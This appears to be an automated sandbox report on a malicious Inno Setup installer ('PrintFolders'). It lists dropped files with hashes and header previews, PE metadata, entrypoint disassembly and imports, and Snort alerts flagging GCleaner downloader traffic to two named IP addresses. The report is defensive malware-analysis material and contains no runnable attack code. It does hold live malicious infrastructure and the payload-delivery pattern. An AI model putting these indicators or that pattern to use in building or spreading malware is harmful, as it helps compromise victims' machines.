Encrypted:	false
SSDEEP:	48:zXlihyMHLBv8iD86plmlDFoIN0hqkLVO3471qVToa0zA47bJMuGq:xYrp8iD86p4lJoIyhqYOIh0Xc
MD5:	34C89D308FC4DAAF854CA976FAD1C258
SHA1:	10BAAA5B799348A599A4E6AC501B1B3C3B931C39
SHA-256:	00FE7490A30A0F5572324B7C6847FF7F94F3B05E14613BC7579F7A48B1678B6A
SHA-512:	CBB5591FDBAB42EE73CF43E424467837471F8603C7F1A98A90DBADE6477B69A5E8A913DE6B3D655A74F95D13F35509C806EDBFD023876B1DF0F1345600DB68A6
Malicious:	false
Preview:	Inno Setup Uninstall Log (b)....................................{3C248D7A-78F2-476F-86FF-34610A9B2E85}}.........................................................................................PrintFolders....................................................................................................................*...........%.................................................................................................................u........m.{[......C....618321.user#C:\Program Files (x86)\PrintFolders.........../...... ..........Q.IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..'...dll:kernel32.dll.CreateFileA.............#...dll:kernel32.dll.WriteFile...........!...dll:kernel32.dll.CloseHandle.......!...dll:kernel32.dll.ExitProcess.......$...dll:User32.dll.GetSystemMet

C:\Program Files (x86)\PrintFolders\unins000.exe (copy)

Process:	C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	714506
Entropy (8bit):	6.488639273564823
Encrypted:	false
SSDEEP:	12288:Ih5UooqWolrP837JzHvA6izJgnnyFNmayiAZrvo6xOZ:q5NoqWolrP837JzHvA6yknyWFxvVxOZ
MD5:	F82EF8A460249A7A71B8DA396C651027
SHA1:	1BA036C9860EB581550998DA24980CC63CD7E2C9
SHA-256:	B7B477D0DE6348FAEA68869B86782B2859AC302A0DFE5C91B94CE65CFAD31218
SHA-512:	F331C2149313896A37AD0F268EB83EFF75B1A65EE1372185F02558F49BB4E0DE2BF9565D93DEF6A0009D37A2CDC297CC14108629CDBE168FDDA202470BEBE31A
Malicious:	true
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................t.............@..............................................@..............................$%...........................@...............................0......................................................CODE................................ ..`DATA................................@...BSS.....x................................idata..$%.......&..................@....tls......... ...........................rdata.......0......................@..P.reloc.......@......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\fuckingdllENCR[1].dll

Process:	C:\Program Files (x86)\PrintFolders\ntFolders.exe
File Type:	data
Category:	dropped
Size (bytes):	94224
Entropy (8bit):	7.998072640845361
Encrypted:	true
SSDEEP:	1536:NsbI9W6dHdtnEXOxZpPzIUcETzNtXofjmgGTeJduLLt+YBPoJTMRmNXg30:KWW6TZVz9PNtXo8M5OR0
MD5:	418619EA97671304AF80EC60F5A50B62
SHA1:	F11DCD709BDE2FC86EBBCCD66E1CE68A8A3F9CB6
SHA-256:	EB7ECE66C14849064F462DF4987D6D59073D812C44D81568429614581106E0F4
SHA-512:	F2E1AE47B5B0A5D3DD22DD6339E15FEE3D7F04EF03917AE2A7686E73E9F06FB95C8008038C018939BB9925F395D765C9690BF7874DC5E90BC2F77C1E730D3A00
Malicious:	false
Preview:	...mi...};...F".).T..'K;....O.Y0:.....3j.\.Ij.2R.P....C...q.\|.2.....iR2W.F.C=MU......H6...A.....@..O.c...M.x8...L..- ..b..\|.C...Z}.w...l.a.aT...br,...6w#.j.P.li.=......o.......S.{..R........5....#;....-....b+..G(.>..Q.....iN{.+y...ZC.z3sE...T..2.J...3.9U.4&..P......."wI.....@....x%>..D..'z.^....^(.....NC.[[k..........V]G..)e.....`.......K/L.Ul..F.."..8$.Ad....:i.g..0.d...[...T"l.U.M.=.0...,..,.ku.W,.....7`Q.Fi=w...u..:..Q-.R.}0...L.....n...t.nv.....z....e..I.C.....9.V.~1+[]..7...xQ........$.L..o.eQ./.b..Z......p].;i)...#.b...%1........@...G..[......./.c.Z......G.:..n..E.i.O..o.U.B.Px....1{,a.....#k.dj..L4...}.d<......Iyy.J..f.W..,^vV.Ao.K."+OX8!F...YP...u.-..Bik.[.u...&Wt..P...m....^ ..k~.....l..o.zMV.!s..h...{.n2;z...K..?S..-...eW...c.....-V.bg..9.I..g.x.g...}.'.5..(P...J#..:.IS..D}.v......jK9.LQF...oOhV...).h.v^-..F...<.....Vh.1....!...!...BYc..C?..D2.....2.K(..6....B....D..ay..=\|....'....[1.~.YB:./...A`...=..F..K...........

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\ping[1].htm

Process:	C:\Program Files (x86)\PrintFolders\ntFolders.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	17
Entropy (8bit):	3.1751231351134614
Encrypted:	false
SSDEEP:	3:nCmxEl:Cmc
MD5:	064DB2A4C3D31A4DC6AA2538F3FE7377
SHA1:	8F877AE1873C88076D854425221E352CA4178DFA
SHA-256:	0A3EC2C4FC062D561F0DC989C6699E06FFF850BBDA7923F14F26135EF42107C0
SHA-512:	CA94BC1338FC283C3E5C427065C29BA32C5A12170782E18AA0292722826C5CB4C3B29A5134464FFEB67A77CD85D8E15715C17A049B7AD4E2C890E97385751BEE
Malicious:	false
Preview:	UwUoooIIrwgh24uuU

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\library[1].htm

Process:	C:\Program Files (x86)\PrintFolders\ntFolders.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\count[1].htm

Process:	C:\Program Files (x86)\PrintFolders\ntFolders.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\library[1].htm

Process:	C:\Program Files (x86)\PrintFolders\ntFolders.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

C:\Users\user\AppData\Local\Temp\is-O82Q5.tmp\_iscrypt.dll

Process:	C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2560
Entropy (8bit):	2.8818118453929262
Encrypted:	false
SSDEEP:	24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
MD5:	A69559718AB506675E907FE49DEB71E9
SHA1:	BC8F404FFDB1960B50C12FF9413C893B56F2E36F
SHA-256:	2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
SHA-512:	E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 2%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-O82Q5.tmp\_isetup\_setup64.tmp

Process:	C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	4.226829458093667
Encrypted:	false
SSDEEP:	48:6Q5EWGg69eR+Xl4SH8u09tmRJ/tE/wJI/tZ/P8sB1a:32Gel4NP9tK2/wGXhHa
MD5:	9E5BA8A0DB2AE3A955BEE397534D535D
SHA1:	EF08EF5FAC94F42C276E64765759F8BC71BF88CB
SHA-256:	08D2876741F4FD5EDFAE20054081CEF03E41C458AB1C5BBF095A288FA93627FA
SHA-512:	229A9C66080D59B7D2E1E651CFF9F00DB0CBDC08703E60D645651AF0664520CA143B088C71AD73813A500A33B48C63CA1795E2162B7620453935A4C26DB96B21
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........o4...g...g...g).zg...g...g...g.&lg...g.&yg...gRich...g........PE..d...9TTB..........#...........................@..............................P...............................................................!..x............@..H.................................................................... ...............................text............................... ..`.rdata....... ......................@..@.data...,....0......................@....pdata..H....@......................@..@................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-O82Q5.tmp\_isetup\_shfoldr.dll

Process:	C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	23312
Entropy (8bit):	4.596242908851566
Encrypted:	false
SSDEEP:	384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
MD5:	92DC6EF532FBB4A5C3201469A5B5EB63
SHA1:	3E89FF837147C16B4E41C30D6C796374E0B8E62C
SHA-256:	9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
SHA-512:	9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 2%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	704000
Entropy (8bit):	6.478833170287182
Encrypted:	false
SSDEEP:	12288:gh5UooqWolrP837JzHvA6izJgnnyFNmayiAZrvo6xOM:y5NoqWolrP837JzHvA6yknyWFxvVxOM
MD5:	2C3832FDF847813369EC960CD39C8265
SHA1:	35B24C0B451E987C1E2B07B670A65FBCB02B118C
SHA-256:	2820D4BDBD9CAB3EEE82C86B11CFB2B8EC55247BCB975331078ECD182C1471B2
SHA-512:	408A642264E967AAA78CC7B58529AAA152BA85AF12A4DC7DBA0A82E560E08299031CB45D8DE78E5FA26F03FC6DB863344AAA68E010F7DDDA4FC29501365D986A
Malicious:	true
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................t.............@..............................................@..............................$%...........................@...............................0......................................................CODE................................ ..`DATA................................@...BSS.....x................................idata..$%.......&..................@....tls......... ...........................rdata.......0......................@..P.reloc.......@......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\LUxJPTIXtIs.exe

Process:	C:\Program Files (x86)\PrintFolders\ntFolders.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	6.20389308045717
Encrypted:	false
SSDEEP:	1536:bvUpDLxyxA14o3/M238r6+XfHAgbqmE8MpKdwuasZLUM7DsWlXcdyZgfmi:WDLZKa/MtXfHAgbqmEtxsfmyZgfmi
MD5:	3FB36CB0B7172E5298D2992D42984D06
SHA1:	439827777DF4A337CBB9FA4A4640D0D3FA1738B7
SHA-256:	27AE813CEFF8AA56E9FA68C8E50BB1C6C4A01636015EAC4BD8BF444AFB7020D6
SHA-512:	6B39CB32D77200209A25080AC92BC71B1F468E2946B651023793F3585EE6034ADC70924DBD751CF4A51B5E71377854F1AB43C2DD287D4837E7B544FF886F470C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........................................................................9...........Rich............................PE..L....,?c.....................~......_.............@..........................`............@.....................................(....@.......................P..........8...............................@............................................text............................... ..`.rdata..dY.......Z..................@..@.data........ ......................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, InnoSetup self-extracting archive
Entropy (8bit):	7.9848801233119335
TrID:	Win32 Executable (generic) a (10002005/4) 98.88% Inno Setup installer (109748/4) 1.08% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	2268666
MD5:	f6ef13946619524c0e6bb1c01cfa73fb
SHA1:	e8a59c66c15d4a1681cff18cb8a9750db3da648f
SHA256:	e2224686d59ed32b39689b853a88c3f17720dead31201d8920d4ef5d71ed4eb7
SHA512:	a34d316050efeeebc9452be517ae1dd0c96039b2bb176b5d8388412c3de2f69271896bb34249ca1042d0dda8954d22e7bdb0938963ef58ab73f5402abb8bf80f
SSDEEP:	49152:O4Y7nFp2Vwdy+wrOgoc3bIa0/O1bmOBH83rP8fMbYKfZ5:OP7FAVYydrDIzW1bmOBYwMcKfj
TLSH:	DDB533C1FAE1213DEAB651F52C1295B402F73DF0ACF1544A7A4E7B22A773391224B636
File Content Preview:	MZP.....................@.......................Inno..".-b..............!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	ecccdac6c6c6d464

Static PE Info

General

Entrypoint:	0x40968c
Entrypoint Section:	CODE
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	1
OS Version Minor:	0
File Version Major:	1
File Version Minor:	0
Subsystem Version Major:	1
Subsystem Version Minor:	0
Import Hash:	da86ff6d22d7419ae7f10724a403dffd

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFD4h
push ebx
push esi
push edi
xor eax, eax
mov dword ptr [ebp-10h], eax
mov dword ptr [ebp-1Ch], eax
call 00007F8C10FA246Fh
call 00007F8C10FA371Ah
call 00007F8C10FA590Dh
call 00007F8C10FA5954h
call 00007F8C10FA7EA3h
call 00007F8C10FA7F92h
mov esi, 0040BDE0h
xor eax, eax
push ebp
push 00409D71h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
xor edx, edx
push ebp
push 00409D27h
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
mov eax, dword ptr [0040B014h]
call 00007F8C10FA891Fh
call 00007F8C10FA84DEh
lea edx, dword ptr [ebp-10h]
xor eax, eax
call 00007F8C10FA5DC8h
mov edx, dword ptr [ebp-10h]
mov eax, 0040BDD4h
call 00007F8C10FA251Bh
push 00000002h
push 00000000h
push 00000001h
mov ecx, dword ptr [0040BDD4h]
mov dl, 01h
mov eax, 004070C4h
call 00007F8C10FA642Bh
mov dword ptr [0040BDD8h], eax
xor edx, edx
push ebp
push 00409D05h
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
lea edx, dword ptr [ebp-18h]
mov eax, dword ptr [0040BDD8h]
call 00007F8C10FA6503h
mov ebx, dword ptr [ebp-18h]
mov edx, 00000030h
mov eax, dword ptr [0040BDD8h]
call 00007F8C10FA663Dh
mov edx, esi
mov ecx, 0000000Ch

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc000	0x8c8	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x10000	0xd5a0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xf000	0x0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xe000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
CODE	0x1000	0x8e00	0x8e00	False	0.6218364876760564	data	6.600437911517656	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA	0xa000	0x248	0x400	False	0.3115234375	data	2.7204325510923035	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS	0xb000	0xe64	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xc000	0x8c8	0xa00	False	0.389453125	data	4.2507970587946735	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0xd000	0x8	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0xe000	0x18	0x200	False	0.052734375	data	0.1991075177871819	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc	0xf000	0x86c	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc	0x10000	0xd5a0	0xd600	False	0.2876204731308411	data	5.7136247823841	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x1042c	0x1628	Device independent bitmap graphic, 64 x 128 x 8, image size 4608	English	United States
RT_ICON	0x11a54	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2688	English	United States
RT_ICON	0x128fc	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152	English	United States
RT_ICON	0x131a4	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 672	English	United States
RT_ICON	0x1386c	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320	English	United States
RT_ICON	0x13dd4	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States
RT_ICON	0x17ffc	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States
RT_ICON	0x1a5a4	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States
RT_ICON	0x1b64c	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States
RT_ICON	0x1bfd4	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States
RT_STRING	0x1c43c	0x2f2	data
RT_STRING	0x1c730	0x30c	data
RT_STRING	0x1ca3c	0x2ce	data
RT_STRING	0x1cd0c	0x68	data
RT_STRING	0x1cd74	0xb4	data
RT_STRING	0x1ce28	0xae	data
RT_GROUP_ICON	0x1ced8	0x92	data	English	United States
RT_VERSION	0x1cf6c	0x3a8	data	English	United States
RT_MANIFEST	0x1d314	0x289	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
kernel32.dll	DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
user32.dll	MessageBoxA
oleaut32.dll	VariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
kernel32.dll	WriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SetLastError, SetFilePointer, SetEndOfFile, RemoveDirectoryA, ReadFile, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, InterlockedExchange, FormatMessageA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
user32.dll	TranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
comctl32.dll	InitCommonControls
advapi32.dll	AdjustTokenPrivileges

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
107.182.129.235192.168.2.380496992852925 12/09/22-10:47:08.950307	TCP	2852925	ETPRO TROJAN GCleaner Downloader - Payload Response	80	49699	107.182.129.235	192.168.2.3
192.168.2.345.139.105.17149698802041920 12/09/22-10:47:08.733822	TCP	2041920	ET TROJAN GCleaner Downloader Activity M8	49698	80	192.168.2.3	45.139.105.171

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 9, 2022 10:47:08.705904007 CET	49698	80	192.168.2.3	45.139.105.171
Dec 9, 2022 10:47:08.733005047 CET	80	49698	45.139.105.171	192.168.2.3
Dec 9, 2022 10:47:08.733119011 CET	49698	80	192.168.2.3	45.139.105.171
Dec 9, 2022 10:47:08.733822107 CET	49698	80	192.168.2.3	45.139.105.171
Dec 9, 2022 10:47:08.760735989 CET	80	49698	45.139.105.171	192.168.2.3
Dec 9, 2022 10:47:08.769081116 CET	80	49698	45.139.105.171	192.168.2.3
Dec 9, 2022 10:47:08.769258976 CET	49698	80	192.168.2.3	45.139.105.171
Dec 9, 2022 10:47:08.834444046 CET	49699	80	192.168.2.3	107.182.129.235
Dec 9, 2022 10:47:08.863338947 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:08.863445997 CET	49699	80	192.168.2.3	107.182.129.235
Dec 9, 2022 10:47:08.865816116 CET	49699	80	192.168.2.3	107.182.129.235
Dec 9, 2022 10:47:08.892735958 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:08.892951965 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:08.893037081 CET	49699	80	192.168.2.3	107.182.129.235
Dec 9, 2022 10:47:08.923158884 CET	49699	80	192.168.2.3	107.182.129.235
Dec 9, 2022 10:47:08.949912071 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:08.950306892 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:08.950339079 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:08.950364113 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:08.950387955 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:08.950409889 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:08.950422049 CET	49699	80	192.168.2.3	107.182.129.235
Dec 9, 2022 10:47:08.950423002 CET	49699	80	192.168.2.3	107.182.129.235
Dec 9, 2022 10:47:08.950433969 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:08.950458050 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:08.950481892 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:08.950485945 CET	49699	80	192.168.2.3	107.182.129.235
Dec 9, 2022 10:47:08.950485945 CET	49699	80	192.168.2.3	107.182.129.235
Dec 9, 2022 10:47:08.950505018 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:08.950519085 CET	49699	80	192.168.2.3	107.182.129.235
Dec 9, 2022 10:47:08.950530052 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:08.950553894 CET	49699	80	192.168.2.3	107.182.129.235
Dec 9, 2022 10:47:08.950553894 CET	49699	80	192.168.2.3	107.182.129.235
Dec 9, 2022 10:47:08.950578928 CET	49699	80	192.168.2.3	107.182.129.235
Dec 9, 2022 10:47:08.977371931 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:08.977428913 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:08.977446079 CET	49699	80	192.168.2.3	107.182.129.235
Dec 9, 2022 10:47:08.977475882 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:08.977504015 CET	49699	80	192.168.2.3	107.182.129.235
Dec 9, 2022 10:47:08.977521896 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:08.977571964 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:08.977571964 CET	49699	80	192.168.2.3	107.182.129.235
Dec 9, 2022 10:47:08.977596045 CET	49699	80	192.168.2.3	107.182.129.235
Dec 9, 2022 10:47:08.977619886 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:08.977622032 CET	49699	80	192.168.2.3	107.182.129.235
Dec 9, 2022 10:47:08.977663994 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:08.977669001 CET	49699	80	192.168.2.3	107.182.129.235
Dec 9, 2022 10:47:08.977710009 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:08.977713108 CET	49699	80	192.168.2.3	107.182.129.235
Dec 9, 2022 10:47:08.977752924 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:08.977763891 CET	49699	80	192.168.2.3	107.182.129.235
Dec 9, 2022 10:47:08.977797985 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:08.977816105 CET	49699	80	192.168.2.3	107.182.129.235
Dec 9, 2022 10:47:08.977842093 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:08.977848053 CET	49699	80	192.168.2.3	107.182.129.235
Dec 9, 2022 10:47:08.977895021 CET	49699	80	192.168.2.3	107.182.129.235
Dec 9, 2022 10:47:08.977896929 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:08.977941990 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:08.977948904 CET	49699	80	192.168.2.3	107.182.129.235
Dec 9, 2022 10:47:08.977986097 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:08.977992058 CET	49699	80	192.168.2.3	107.182.129.235
